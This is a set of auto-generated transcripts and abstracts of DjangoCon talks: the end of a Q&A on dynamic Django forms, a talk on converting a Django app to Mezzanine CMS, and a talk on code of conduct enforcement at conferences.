because we really should, and I think that is, like, an ultimate goal of ours is to open source a solution once it becomes, like, detangled from all the weird special case stuff that we have written in it. Um, so that's probably, that's probably something that's going to happen in the future, because I can see that being useful to a lot of people who want to integrate Django and React, is if you want to go that route, um, we already have a solution built, and I want to be able to say that it's going to be open source at some point in the near future. I just can't tell you exactly when that would be. I don't know if there are other projects that have that sort of thing. I know we can't be the only people integrating Django and React, and I think there's another talk even happening about that integration, so I'd be curious to see, you know, what other libraries are out there. I don't really know. Great. Thanks so much. Uh, hey, you mentioned, um, that you have sometimes third-party services where you do validation on certain user inputs, and that you don't want to do the actual appending of the errors in the FormsClean method. So where do you actually do that, or what's your approach there? Um, so I meant, like, doing the service call in the actual FormClean. Um, what I would just do is, like, move that out into a method so you don't have this huge, because you're going to have a whole bunch of stuff when you're clean if you have any sort of complex requirements as far as the data that can be entered. So, yeah, in terms of, like, where you would add the third-party errors, I would just do it in a, another method on your Form that gets called in clean, but make sure that your clean doesn't become some unmanageable thing. It's kind of what I was getting at with that. Hello. Thank you for your report. I have a question. So, uh, with your approach, um, Frontend controls the structure of the Form, right? So are there some security issues like cross-size scripting, like, uh, from JavaScript, I can post some unwanted fields that shouldn't be there? Uh, so, I guess content, the content does not control the structure of the Form, right? The data, I guess you're talking about more the user-driven fields thing? And even that, there is a super, there always has to be a super set of what is allowable, because you can't let the user define custom fields. Or if you do, you kind of have to hack around it and do something where, like, the custom field that the user is defining is actually some, it's a concrete field on the back end. You can never let the user modify your actual Form structure. So what we have is, like, we have a super set of all the possible things the user could do. We don't let them add their own dynamic things that aren't part of our super set, because that, you're right, that would have security issues. Um, I mean, even so, like, there is, for example, a field like credit card number. And you expect it only in some circumstances, like, user should fill in his first and last name or some checkbox. But I can construct, um, JSON that contains credit card without those fields. And I can send it. So do you have some additional server-side validation for such cases? Yeah, so the field structure, the form that renders, um, it has to match, or rather the form that the user enters data into has to match the back end. They're not two separate structures. So if I send you, if I render a field structure, but then the user enters an additional, I guess in that case, um, that doesn't really hit the server-side. If I understand what you're suggesting, is that, like, somebody scripts an additional field that isn't really on the form? Uh, it is on the form, but it appears only in some case. Right, and, right, in that case, your field structure on the back end would know that that's not there. And so that data, the data would, you would get some sort of validation error on the back end when you try and post a field that isn't there. That would cause a problem. Okay, thanks. Have you tried to allow a user to get halfway through a, um, kind of long form, um, and save their state and then come back to it and pick up where they left off, maybe in the middle of one particular form? Yeah, so we've gone back and forth about that, it seems like. Like, um, but yeah, do you have some others, like, specific questions about, like, doing that? Just, just, like, yeah, have you had challenges since you have tried it? Have you had challenges integrating that kind of work, doing that with this workflow? Yeah, um, the problems with that, we have had a lot of challenges with that. The problems with that tend to be, like, validation. Like, um, we have all these problems about, like, what kind of validation, some validations are not important all the time. Uh, for instance, like in that case, if you want the user to be able to save partial data and come back later, uh, you don't want, you don't want to always run your required validation. But your required validation is important, so, uh, we've gone, we've gone back and forth about, like, what you actually do in those circumstances. But I think it's definitely, with this structure, it's not a super difficult problem to solve. I think you can go back and forth pretty easily on what you actually want the end user behavior to be. Alright, so, uh, I think that's it then. APPLAUSE
|
We'll look at a few core problems that we were able to solve with Django forms. Dynamic Field Creation: What if you don't know what fields should be present on a Django form until runtime?. Solutions: Viewing a form's fields as a data structure (convert a field definition to a dictionary) Manipulate self.fields on a form to dynamically add / remove forms from a field. Pitfalls: A fields validated attributes can't be manipulated dynamically because of Validators within the forms API. Dynamic form layouts become difficult to manage, crispyforms does not scale as a solution! Validate a form via an API: How can external validations behave the same as internal errors? Solutions: form.clean() can be used for form wide errors, and form.add_error can be used to integrate those external validation errors into your existing form so that calls like is_valid() still work as expected with your external validations. Adding fields at runtime: How can the user add fields to a form after it has been rendered? Solutions: Javascript can be used for the UI, and if the fields are properly named, the same validations will work as long as the fields are part of the form. Pitfalls: Creating a solution that creates a dynamic field that is validated, but doesn't render can cause issues with your layout solution (crispyforms fails again here)
|
10.5446/32717 (DOI)
|
Come on, Noah! MUSIC Okay, yeah, I'm Ed. I'm a contributor to Messonium CMS. In this stock, I want to take us in a journey to explore the features that Messonium provides by default and how they can help you with your Django knowledge to really make the most out of it and create great content, audience, and sites. We're also going to explore creating, taking an existing Django app and converting it to a fully integrated Messonium app. Right, so I want to start by talking a little bit about Messonium CMS. Who here knows anything about Messonium? Alright, so this interest is going to be needed. Well, here's a little bit of trivia for you. It was created by Stephen McDonald, a guy from Australia. It's been under development for seven years now with comic activity every week. It has more than 275 contributors. You can also find a very helpful community. We have a very active mailing list where you can get development and support in general. It's well-documented, I believe, and you also have a variety of third-party packages, many of them available through PIP2. So now, a little bit more about the architectural, philosophical side of Messonium. Messonium is a very powerful, consistent, and flexible content management platform. It provides a very simple yet highly-extensible architecture that encourages diving in and hacking on the code. You'll get the same batteries-included approach as Django, but applied to content management. You get a blog for free, a hierarchical page navigation, schedule publishing of your pages, multi-tenancy support for multiple sites, and there's a huge list of features that are there for you. Messonium also inherits a bunch of Django's fine-grained permission controls, security best practices, of course, and you'll be able to leverage much of the goodies and things that you already know about Django in your Messonium application. But maybe the most important thing about Messonium is it's just Django. It's right there in the docs if you go check them. There's a quote that says, Messonium is just Django, so everything you know about writing models, about writing views, about writing templates will be good for you and you'll be able to hit the ground running if you know at least a little bit of Django already. All right, so let's get started now and convert a small application. Well, let's start with the selling Messonium and then convert an application to work with it. So as you can see, as any other Python package, you can install it via pip. It will download all the dependencies, including Django. Then you can run this Messonium project command, which don't get scared, it's just a wrapper around Django's Django project command, and it will give you the started layout or project template with some of the settings and URL configuration already filled in for you, but other than that, it's just a regular Django project. Then after that, you run create database, create db, which is the same thing, it's just a wrapper around migrate from Django. You only need it to create a default user, a super user, and if you want, you can also install some demo content for you to get started quickly. And after that, run server, which is just a standard Django command. So now you open your browser in localhost, and this is what you get out of the box. You have a complete nested page tree, you've got inside search, you've got a basic bootstrap template, you've got a blog, and many, many other things just for free, just for installing Messonium via pip. So let's write our own application or convert one, a standard Django application to better integrate it with Messonium. So I'm going to use the Pulse application because I think it's well known if you have ever completed the Django tutorial. It's just a very simple application. I like it because it will let us play with two models, the Pulse model. If you remember, it just has a question prompt, and then it has the choices, which are an inline model that you'll be able to give options to answer the question you're pulling about. This is editor will be at the admin side, you just register the admin class. It has a list and a detail of you two, and it will handle form input like voting. This is what the Pulse application does by default when you complete the tutorial. So how do you install an application in Messonium? Well, it's just like any Django project. You add your app to installed apps and settings, you wire up your URL configuration, and finally you run migrations, if any, and you're up and running. Of course, if your app is more complex and you need to define custom middleware, you need to define context processors, or anything like that, you can do it. It's just like installing anything on Django. So right after doing that and adding the Pulse application as it came from the tutorial directly into the Messonium project, this is what you get. Messonium uses graphically as the admin interface, but other than that, you don't need any changes in your admin class or your model definition, or anything to get this working. You get the regular model admin and also the inlines, just as you define them in the regular application. And the public facing views also work as you would expect it. This is the view that comes with the poll app. Again, you just wire the URL configuration and you'll get this working out of the box without any changes. So let's spice it up a little bit. Let's say that some new requirements come in and you want to change the behavior of the application. So we can do that, but let's define those requirements. Let's say you want a publishing workflow, and what do I mean with a publishing workflow? That we want some application, some polls to be able to be set on draft. For example, if our admin users, they're creating a new poll, but they don't want to publish it right away. They can save it in the admin, save it as draft, and it will not be available in the public site. So they can come back and work on it later. We also want them to be able to schedule publishing. We want them to be able to say, okay, this poll is going to be live, going to go live next week, Monday, midnight. And we also can set expiration dates and we want to say, okay, this poll is going to expire next Friday at the end of the day. We also want the most recent polls to appear first. So we want to have some way to control which poll was published recently, which is a common requirement. We also want to use logs instead of primary keys in the URL. So our URLs for SEO and readability purposes, maybe we don't want to have, you know, my site.com slash poll slash 43, when we can have poll slash my awesome poll, you know, more shareable, more readable. And we also want the choices to be sortable. And our admin users, let's say, they have the choices that they just don't want to sort them as they add them. Maybe they want to change the sorting after that. So how are we going to do that with Messinine? Well, this is the original model, the original polls model. If you can, you very easy just a single field, the question, which is just a text from for users to insert the question. Now the displayable model, this is one of the base models that ships with Messinine. And this is the one that you're going to be inheriting a lot. It's a base for all public facing content pieces in Messinine. This is what's going to add the draft published status to our model instances. This is the same as going to allow you for schedule publishing. It can auto generate slugs from your title and just create them automatically, though you can override these slugs if you want to craft them yourself. And it comes with some helper admin classes and manager for that. You're going to get some fields by default. You're going to get a title field. You're going to get a meta title field if you want to change how the piece of content appears in the browser title bar. You're going to get this is love field, which is going to be, which can be auto generated or you can customize it. You'll also get a description in case you want to automatically populate the browser meta description with the description from your content or the content from your page. You also get a publish date, which is going to be a standard Django daytime object, which you can manipulate later. You also get the status where you're going to be able to check whether a piece of content is published or is set as draft and a bunch more, which are not important right now. So we're going to inherit from this model. We just import it from Messening. And yeah, we just class it and that's it. We actually can get rid of the question from because the model is going to define its own title field. And that's what we're going to use for the question. And yeah, just inherit from it. Of course, in case you need to add more fields, you can do it normally, create your own Django fields and customize. If we want to say, oh, it's going to have a picture, for example, okay, a file field right there. And this is the original admin. You can see we have to define our field. We want to define the inlines to display the choices. Want to define who's going to be displayed in the least view. And we want to define who is going to be searchable from the admin. This is the original one that came from the pulse application. And this is how it looked. And we're going to use now the displayable admin class on that. And this is the same. We're just going to inherit from Messening. And just the only change we need to do is tell it which inlines we want to use, right? The choices, little choices behind it, after it. We just need to specify that because we'll see how this will change the admin interface for us. So this is the new admin you get. And you can see you get, well, the title. That's our old question from, we use that now. This log will be generated from that. And automatically you can use it in your views to retrieve the object. You also get the draft and publish toggle for your users to pick if they want the content to be drafted published. You can set the publish from and expires on dates to define when should something be available in the public site or not. And in the metadata panel, which this one is a collapsible panel, it will allow you to tweak the generated a slug, add meta keywords, add a description, and choose if you want to include this page in your site's sitemap. And in the least view, we're going to get a full search on the title of the polls. We're going to get a date hierarchy on the publish date. We're going to be able to filter by status. You're going to be able to switch out the publish status of the polls right from the least view. So all of this we just got from inheriting from Messon's models and Messon in admin classes. So now how about the view? If we know that our polls are going to be someone going to be drafted and someone going to be published, we of course only want users to be able to see the published ones. We simply have to use the publish manager. Basically what you have to do, and this is a very simple class-based view, the one that again is shipped with the polls application, the only thing you want to do is when you're getting your query set, either on a class-based view or a function-based one, instead of doing objects.all, you do objects.publish. And with that, with the manager that comes from methaname, you already are going to return only the published ones. So you have to worry that your public-facing users, your public-site users are going to see content that doesn't meant for them to see. And after that, you can do the order by the published date to get the most recent polls first. Yeah, so this is what the view ends up looking like. You get the polls, and then you have them sorted by how recently they were published. The next thing is what we were talking about, being able to sort the little inlines, the little choices. We don't want to have the choices appear as they were added. Maybe the admin users want to have, you know, I want this one on top. Let's move this one to the bottom. So we're going to use the orderable model, which also ships with methaname. It's ideal for sortable inlines. It comes in both stack and tidal varieties. You can drag and drop sort with it. And it will also support dynamic creation for more inline forms. So you don't have to define the extra, how many extra inlines you want to show to the user. They can just keep creating them and populating them. Of course, you can limit that with the standard Django admin classes. So it's the same here. We're going to edit our choice model. We're going to inherit from orderable and just set a foreign key to our old poll model, set the choice text, and set the integer field to store how many votes has each choice got. And in the admin class, we only inherit from tabular dynamic inline admin. There's also the stack it variety. And this is what you get. You get your choices and you get those little handles, which you can sort. Man, what users can use their mouse to sort them, you know, they can use any arbitrary ordering they want. And they also get the little add another button, which will let them create as many inlines as they want. They don't have to do three at a time or anything like that. And lastly, well, some templates. I'm just going to go quickly over this because we don't have much time. But this is the template that the polls application came with, right? Not very pretty. But, you know, you can write any CSS you want, it gets you all the flexibility. But if we go ahead and edit it to extend some of the basic templates that come with Messening already, if you, for example, extend the base HTML template, use the title block and put all your main content in this main block, this is what you get. You get it integrated into the bootstrap theme. Now here I know you might have different opinions on bootstrap and everything. The point here is not to make you use bootstrap. I don't want you to think that, oh, Messening is bootstrap. Then I cannot do anything out of it. It's just there as a default to get you up and running quickly. You want to show a prototype quickly. You want to use a free bootstrap theme. This is for you then. You only have to extend Messening templates and use the right blocks. And you can get something like this very quickly. So let's review what we did, the steps that we followed to convert a regular Django application into a fully integrated Messening app. So in the models, your main models, you're going to want to evaluate if you want to inherit from this level to get you all the public-facing goodies that we reviewed before, the auto-generated slug, the published status, the scheduled publishing. For inline, you're probably going to want to inherit from orderable to get that dry and drop ordering on your models. When you're making queries in your database, in your views or whatever, you want to use objects.publish instead of objects.all to make sure that scheduled publishing is working as expected. And then for templates, you want to extend Messening blocks. You want to use the Messening included templates if you want to use bootstrap on your site and just get that site up and running quickly. Now, there's a whole bunch of things that I haven't even talked about here. Messening supports custom page types so you can create custom pages that your users can use when creating the page tree in Messening. You also have a complete file manager in your server, which means users can upload and manage their files. Instead of just having that little file input in your forms and your admin, you can have one that lets them browse inside the media that already exists in the site. And it's much more easier to work like that. Messening also ships with a series of fabric scripts that you can use to automate deployments. So if you get a $5 VPS from any web hosting provider online, you can get up and running very easily, even if you haven't done any Django deployments before. It also has page processors that will let you, it's like writing views, but for your custom pages and will let you inject context into the template, whatever you need it. It also has an e-commerce module where you're going to be able to integrate a shopping cart and shopping categories and prices and variations. It also has a whistle-wake editor, which is swappable, in case you don't like the default. You can define very easily your own custom class and include your media to be used instead of the default. It also has user-editable settings, which will allow your users, for me, to stuff very simple like, I don't know, what's your site's Facebook or Twitter URL, and you just want to type that in. You don't want that in version control. You want that for them to edit it in the admin, and it's easier, and you can use it whatever you want in the backend or in your templates. So there's a little bit more you can read. I mean, what can you do after this talk? It has a page in their documentation that's called the content architecture, and I think it's one of the most important pages. It goes into detail of what I've explained here, what is the displayable model, what are you supposed to do with it. It also has another strategy for creating custom page types, which is out of the scope of this talk, but you should read that. There's a couple of community blogs that you're going to be able to read to that's very good on some specific bio-tested parts to develop Messonian applications, and there's also the Messonian blog application. As I told you, out of the box, you're going to get a blog for your site. This blog application is, I think, a great case study of a non-trivial app developed for Messonian, because it has a good deal of views. It has much more complex models. It has its own template tags, so it's a good way to see how you're going to create a more robust, complex application that is integrated with Messonian. There's no links there, but I'm going to share the slides later and they will have links. Thank you. I've left some of the slide URLs there, and there's a repo for this. All of the things that went through here, which you can use to better understand how to convert your Django app to a Messonian app. Thank you. Hey, it's nice to understand how Messonian works. I just have a curious question that since Messonian is talking more about the content, right? So what is the level of support that it can provide for a no-SQL type data that's flowing from Django to this? How do you define a branch for Django that Django started developing a no-SQL support? So how this framework adapts that? On that level, I'll say it's the same as Django. I mean, if you can get a non-relational database working with Django, with the ORM, that's what Messonian uses, the ORM, and if you can fake that, so to speak, it should work. I haven't really done it, and Messonian doesn't provide anything specific for it, but it's just whatever worked with Django will work with Messonian in that respect. Thank you. Does anyone else have a question? Alright, thank you for your time.
|
Mezzanine CMS is a popular content-management solution for Django. With a rich set of built-in features and following Django’s batteries-included approach, it can supercharge your new or existing apps for content-oriented sites. In this talk we will explore the features that Mezzanine provides by default, and how they take care of many common content-management tasks (page creation and editing, maintaining a blog, WYSIWYG editors, SEO, and more). We will also take an existing Django app and convert it into a fully integrated Mezzanine application. You’ll be surprised at how much of the work has been done for you, and how your existing Django skills will let you hit the ground running when working with Mezzanine. Outline: Mezzanine tour Basic integration of custom models Advanced integration of custom models Working with templates Review Questions (if time permits)
|
10.5446/32719 (DOI)
|
Come on, yo! Hello everyone, it's a really, really great pleasure and an immense honor to be standing here today. We both know it's been a very, very long day. It's very hot outside, it's very cold inside. There's been lots of amazing talks today, a lot to take in, so we're really, really glad that you decided to come to ours. So today, we're going to be talking about code. About code of conduct. So the code of conduct, or we're probably going to refer it to it as COC from now on, it can be quite a sensitive topic. And personally, I didn't feel like I could present this just on my own. But luckily today, I'm not alone on stage. I'm accompanied here by my good friend, Ola. So Ola, she's a long, long time member of the Django community. As was said before, she lives in London, where she works for a company called Potato. But she's originally from Poland. You probably know her the most for co-founding the Django Girls Initiative, but she has many, many other talents. She's organized several DjangoCon, including one that was held in a circus tent in Poland. And she also has her own YouTube channel, where she teaches programming to women. And I couldn't be more grateful to have a Batista of my co-presenter. He lives in Hungary, but he's originally from France. And while working with him, with various community programs, I discovered that he has this gift that always put other people before himself. And it is visible in everything he does in his contribution as a DjangoCourt developer, in his skills and what he does as a conference organizers, and also in his working with Django Girls. And Batista is also the person you want to work with. And he's also a very, very important person. And also in his working with Django Girls. And Batista is also the person you want to find if you want to translate something from English to emoji. And together we've been working at CoC, points of contacts at five major Python and Django conferences over the last three years. And even though we don't consider ourselves experts, we hope that in our talk we'll answer at least some of the questions you might have regarding code of conduct. And at this point I want to stress out that even though things we will talk about in this talk are based on our conference and events experiences, you can take the lessons we learn and apply them to your workplace or open source project or literally any place where people meet and interact. And this is because code of conduct and culturally go together side by side. And one is reflected in another. So I want to start by just explaining what we won't be talking about. So we're not here to discuss whether your community, company, or project requires code of conduct or not. There are many resources online, we don't really have the time for it. I think it's best summed up by this tweet from Lena Reinhardt. Let's let you read for a while. Basically to sum it up, the moment you have humans interacting, you want to have a code of conduct. There's just no way around it. Also we believe that the Django community as a whole has kind of moved past this point where we're just arguing about whether we need one and we just accept as a fact that our community actually needs one. So instead today, we'd rather focus on how you actually implement a good code of conduct in production, so to speak. We'd like to explain what it means in practice to have a code of conduct with some concrete examples that we've had over the years and some tips that we've learned along the way. But before we do that, we want to start with a bit of history of code of conducts inside our communities. And it's very hard to determine when first movements to implement code of conduct in tech industry started. And there's a lot of people who worked really hard to make code of conduct a standard and we are incredibly grateful for their work. And there are too many people to name them here, so we just want to say big thank you to all amazing people who dedicated their time and effort to make code of conduct a thing. And really our community really stands on the shoulders of the giants. But going back to Django and Python community, we did some research and established that 2012 was a year when code of conduct started to be important topic. And Python US implemented one in March 2012, followed by DjangoCon Europe in Zurich in May. And at the end of the year, on 21st of November, Python software foundation and forest conference organizers to have code of conduct at any event they wanted to sponsor. And similarly, on January 9th of the following year, the Django Software Foundation did exactly the same and the board voted that they would only fund events that had a code of conduct. And later on, a few months later in April, the Python community adopted code of conduct as a whole for the community for all its online spaces and they were followed very soon after in July by the Django community who did exactly the same. And the important thing here is to realize that Django community started discussion about code of conduct quite early. At least this is what I feel. And we improved immensely and code of conduct is present and visible at not only at Django and Python conferences, but also in online spaces where our community interacts. And we don't discuss if and why we need it. We discuss how to improve it. And the Django code of conduct was even showcased as a good example of the community code of conduct by other initiative. And I think we should be really proud of Django community for being really forward thinking and striving to be nice and welcoming place for everyone. But even though we find that COCs are kind of standard in our communities, in practice it's not always so easy. You can just put a piece of text on your website for your conference or your community and just be done with it. It's only when you deploy to production that you start to interact with real users that you actually start to see edge cases and things that you hadn't thought about. And during last years when we served as members of various code of conduct response teams, we learned our share. And the response team is responsible for enforcing code of conduct. They receive the reports and are in charge of handling that. And believe me we were far from being perfect. And we have a whole list of things that we wish we did better. And because we think that you can learn from our mistakes we're just going to give you a few examples of the things that we wish we had known in advance. So for example there was a conference where we had a Slack channel similar to what we have this year. Attendees could talk with each other and arrange dinners and stuff like that. And for us it was a big experiment. We didn't really think about it too much, didn't think about the consequences. And with hindsight I think even though it worked really, really well, we did a few mistakes. Like for example one of them is that we never clarified from the start whether this was going to be like a one-time thing just for the duration of the conference or whether it was going to live forever after and if it was going to be moderated forever. We just created it and then we kind of let it on its own after the conference was over. And another problem we made was that we never set up explicit rules from the start. We just assumed people would behave and it would be fine. So we didn't say whether you could send private messages to people without being prompted. Whether you could advertise, send job postings, none of these things. And actually this ended up creating problems because two of the members they understood these implicit rules differently as it always happens. And this was a problem. And here you see that when we create a space for people to interact whether it's a space in a physical world like here today or whether it's a space online where people go and talk to each other, you need always to set explicit rules and not rely on just an implicit understanding. And you also need to think clearly and in advance about the boundaries of the space you're creating. And in boundaries in terms of space like where does the conference end and when does it start but also in terms of time as in this online space is going to be available forever or just for a short time. At another event there was another example of something we haven't thought through well enough. We decided to make code of conduct very visible. We put a lot of effort to create welcoming and safe space. We had like dedicated phone numbers for code of conduct. We had posters reminding about code of conduct even like lifts or elevators. Whatever is the right word in the US, I don't know. We had posters reminding about code of conduct and yeah, we emailed in every email to attendees. We reminded about that. And even though we put so much effort, we forgot something super crucial. And the thing was that we had no dedicated code of conduct email. So whenever you want to use an email, you have to write to all organizers. So you either found one of our emergency numbers, which is not perfect if you are like me and you hate phoning strange people, especially in foreign language. Or you try to find some people from response team and the people were all over the place. Another mistake we made at the same conference had to do with social media. We were using Twitter and we had official conference hashtag, which again was great because people could just go to one place and see everything that was happening. But we went through monitoring it closely and we were also very quick to just re-broadcast, retweet and like things that we just saw without looking too much into them. And again, social media is yet another space that you're creating that you need to have explicit rules for, but also you want to be able to monitor it. Like you want to have someone who has the ability technically and time wise to monitor and react when things happen on social media space. At another conference, we totally underestimated how much effort it is to handle code of conduct issues. And we had a small team, just two of us, and we also had other responsibilities. And we ended up just like dropping whatever we were doing for the conference because we had to deal with code of conduct. And it is so much easier to have a bigger team and dedicated only to code of conduct. And also it makes sure that you will not burn out on the way. Another thing we did wrong was that we had a conference party, so it was an after hours event. And we never really clarified whether this was an official party. That means whether the code of conduct applied to this. And this resulted in fact that some people attended the party and they, let's say, they lost their sense of responsibility because they didn't really think that the code of conduct applied there. And you see this pattern yet again, like you have this space and it needs to have explicit rules because you can't rely on implicit rules. And you need to know what is acceptable, what is not, what is the conference and what is not, and what are the rules for each space because each space may have slightly different rules. At one of the conferences we also had unwritten no comments on the question policy, but we didn't communicate that clearly. And that created very awkward moments after some talks for speakers because our MC interrupted some of the people making the comments. And when we realized that, we made the policy more clear and announced it on stage, but we wish we were more clear at the very beginning about that. And one last example of things that we wish we had done better was that there was a conference where we didn't have a dedicated physical room to handle code of conduct issues. We had the organizers room, which is great, but then organizers who were not on the response team just kept popping in and out and interrupting. And you don't want that the COC issues can be tricky, can be sensitive. You don't want to do them in a crowded hallway where people are passing by, but you also want to limit it to only the response team. So you want to make sure that you have, it doesn't have to be big, but a room, a space somewhere that can be closed and where you can handle code of conduct issues. As you can see, we are indeed far from being perfect and all these things we just talked about happen even though we're like super dedicated to make it right. And we put a lot of effort to create a welcoming space. And dealing with code of conduct issues is hard and you will never have it 100% right. And it's a living evolving process. And there will be always something that is unexpected that you are not prepared to. So one of the most critical things you can do is just plan for failure because you will probably mess up and bad things will happen. And some of them just won't really be a big deal, but some of them they might be. So you need to know how to handle a failure like this. So one of the things you need to do is make sure you have a way to receive feedback, listen on it and act on it and make sure you know how to apologize simply. You need to make sure you have a process for you when you make a mistake. You want to document this failure of organizer and analyze them later so that you can understand what went wrong and then correct so that you can improve. And also you want to be very public about this, I think, because owning up to your mistakes in public, it can be, trust me, a very humbling experience. But it sends a really, really powerful message and a really positive message throughout your community that you really do care and these things do matter. And in a way some of code of conduct issues are not a big deal. If you made some joke that not native speaker could understand and made them feel awkward, for example. Well, it's just a joke. It's not a big deal, right? You meant well, it's just a mistake. And in a way it's not a big deal from the offender point of view. And when someone reports you, except some really serious offenses, code of conduct is not aimed to make you feel unwelcome and you don't need to quit and never speak to anyone in the community. You are still a valuable member of the community. But at the same time it is a big deal. Because the tiny little comment you just did might be a thousand one the person just heard and they might just quit after that. And there is a term for that, death by thousand cuts. So what matters from code of conduct, response team point of view is objective outcome of your actions. If your action excludes someone from our community, we will act and give you necessary feedback. So you will know better next time and you have chance to improve. And we believe that by handling the small things very seriously, we hope to build a trust. So more people will feel okay to share their concerns and speak up if they need it. But what happens when someone speaks up? Concretely what happens when someone files a code of conduct report? I think it's one of the things that can often seem very mysterious. It's scary sometimes even it feels taboo. And we wanted to kind of open this up and clarify what actually happens. And so we made up this kind of completely random example and simplified example to show you the process that we go through when we get a report. So say we are at a conference like this one and we get a report by email saying that here's a tweet. Someone's making fun from our speaker who's on stage and they're using the conference hashtag. So how do we respond? So first thing to do is to let the reporter know that we received the report and we will take care of that. And this is important because it means that we take responsibility of the situation and we'll take care of handling that. And as our organizer you probably want to do that on your own, handle the issue because otherwise people might try to find the justice or do the public framing and it might be very, very serious. And it is also crucial to let the reporter know that you are dealing with this to have a paper trail of what happened. Next up we gather the response team so that we can talk about the incident. We can coordinate a response, assign tasks to everyone. And one of the benefits here of having a team is that for one it's much, much easier to make hard decisions as a group as opposed to as an individual, which you might have to do. And the practical consequence of having a team is that you need to have communication channel with this team and it needs to be private so that nobody else has access to it and it needs to be real time so that you can act quickly. So for example we've used many times a private Slack channel and it just works very well for that. At this point we take screenshots and try to gather as much information about the incidents as possible. So we quickly determine that the person making the tweet is in fact an attendee, they posted the photo of their batch earlier and we can cross check it with a list of attendees. And gathering facts early means that you don't need to rely on your memory later and you can concentrate on other things. So we met with the response team and at the end of the meeting we all together decided about our next action. So in our case we'll be speaking with the person and asking them to do the tweet. It's good here to have an idea before you go in meeting with the person of how you're going to resolve the situation so that you can minimize the damage before. We find the offender during the next break and ask them discreetly to join two of us in a private room. We found that two is an ideal number. You need more than one person sitting in but more than two is just too intimidating. So we're meeting with the person and the first thing we do is that we explain them that we had a report and what was reported. And then we ask them for their own point of view. It's very important to give both sides a chance to explain their point of view. You have to be neutral in the sense of letting everyone explain their point of view. It's also important to explain how and why what happened is a violation of the code of conduct. It's part of letting the person improve. So in our case we explain them what happened and we inform them that it's a violation of the code of conduct and we ask them that they delete their tweet. We got our routine again to inform them of the outcome of the talk and we checked that the tweet was indeed deleted. And it's important to make final decision as a team and keep everyone in the loop. So one person on the response team immediately starts writing an incident report. That's a document where they establish a timeline of what happened as detailed as possible. At least the facts, what we know exactly what happened and also is the people involved in the story. Writing the report immediately here is really, really key because the more time will pass you always think you will have time later but you probably won't. And also you tend to forget things. Maybe you won't be able to take screenshots later on so it's very key that you act on this immediately. Finally we send an email to the reporter explaining the actions we've taken and thanking them for reporting. Again this establishes the paper trail and let the reporter know that we actually took the action and built trust. We also send an email to the offender repeating out from the talk and we let them know that the case is closed. So the case is closed from the offender's point of view but for us as organizers, as response team, there's still a couple of things we need to do. One of them is that we forward the incident report to the Code of Conduct, the Django Code of Conduct Committee. And we also, later after the conference, publish a transparency report where we list all the events that happened during the conference and how we resolved them. But this list is completely anonymized. The first step, forwarding the incident report to the Django Code of Conduct Committee, is a way to have a kind of long-term memory of events of what happens. It helps build track repeated offense that may happen over several years, over several conferences. And the second step of having a transparency report is something that we do to demystify the Code of Conduct process to show exactly what happens so that people know things actually happen, but also show how we respond to them and see that sometimes it probably not a big deal. And this really helps again build some trust with the community. At this point for us as well, we consider the case closed and we move on to the next event. And as you can see, it's like so many steps for a very small thing. And the thing is, in real life, things can be more complex than that. The example here was very straightforward. The offender identity was known and the person was cooperative. The damage was minimized by demitting the tweet. But things could go much more complicated very, very easily and response team needs to make a call on the spot and sometimes judge what are the best actions to take. And when dealing with Code of Conduct issues, you have to be prepared to improvise. But every time you improvise, there's always something that needs to be at your top priority is your attendee's safety. You have to know things in advance like maybe emergency numbers for your local area, or make sure that there is security staff at your venue that can expel people if you need to. Most likely you won't need that, but being prepared in advance just makes it so that when something happens that you didn't plan, which will happen, then it just really lowers the stress and lowers the amount of energy you need to spend to just respond to this. So we've seen with this process how you can implement the Code of Conduct in practice. But I want to stress that it's important to keep in mind that the Code of Conduct is not there for its own sake. It's not a tool of punishment or enforcing some vague values that we have. For us as organizers and as community members, the Code of Conduct is one more tool in a tool belt that lets us create more inclusive events and more welcoming events. But it's not the only tool. You have many tools like making sure your venue is accessible, having free childcare for speakers, attendees, having gender neutral restrooms or food that caters to everyone's diets. You have many, many other tools. So we've seen the Code of Conduct is now a standard thing in our community and we've shown you the examples that it is hard to get it right. And we realize that the hardest and most stressful thing for us in the whole process is when we need to improvise and we don't know what's the next step. And this is why we started to document our process into a step-by-step manual that takes out a lot of improvisation and guesswork. It also takes some of the emotional factor out of the equation. And we are proud to announce that we are releasing our notes and our process online so the whole Django community and not only Django community can use and improve them. And it is joint work with Ola Szytalska who is sitting there and you should go and follow her if you don't do that yet. So this handbook, it's a collection of practical steps that you can take to improve your Code of Conduct process. It shows a process a bit like we did before but much, much more in depth. It talks about some of the do's and don'ts and it also has some things like templates for emails and reports that you can just reuse and fill as you need. The repository is very new. It's still quite work in progress but we think it's already good enough for public consumption. We're also really, really interested in getting feedback on it and hear the ideas of the community and take requests for anyone who wants to improve. And if you get a space, we'll also be there as well and so if you're interested you can come talk to us. Okay, I see we are kind of over time so let's recap. We've shown you a bit of a history of Django community in the Code of Conduct and we also show you the mistakes we've made when we serve in various response teams and how hard it is to remember about everything and if you don't have step-by-step instructions. And we showed you what happens practically when you receive a report and what steps we take to resolve it. So this is our formal process that we're trying to stick to and document so that it could be reused by other communities out there. And we do all work in the open because we believe that Code of Conduct is not only a problem of a response team. It's also not a problem of conference organizers and it's not only a problem of DSF or PSF and it's a problem of community as a whole. And building safe and welcoming environment is extremely hard task. And even though we don't know yet how to do it right, we constantly try to push the limits and set higher and better standards every single year. And we want to believe that Django community will never stop pursuing being an inclusive and awesome community we are so proud to be part of. Thank you.
|
The Django and Python communities have made codes of conducts a standard feature for many years now. But what exactly is a code of conduct? How does it work in practice? Why do we need them? What you should report? What are the consequences of having one? We (Ola & Baptiste) have been working as CoC points of contacts at many conferences for the past few years: EuroPython 2014, DjangoCon Europe (2015 and 2016), and Django Under the Hood (2014, 2015). This has given us a unique insight into the inner workings and practical implications of codes of conducts and we want to share it with the Django community. The talk will start with a brief history of codes of conducts. From then, we'll go over some of the challenges and pitfalls of implementing a CoC in our communities or events. After that, we'll show how CoC work in practice and answer some common questions about them. We will then briefly talk about how lessons learnt from CoC world can be applied successfully in your daily job to grow supportive and strong teams. Finally, we'll finish off by showing the new standardized CoC processes that we've been working on. With this talk, we want to continue the process we've started of bringing CoC to the front of the stage, making them more transparent and less taboo. We believe that CoC are an essential part of any community and we'd like to share our vision for how we think ours should work.
|
10.5446/32721 (DOI)
|
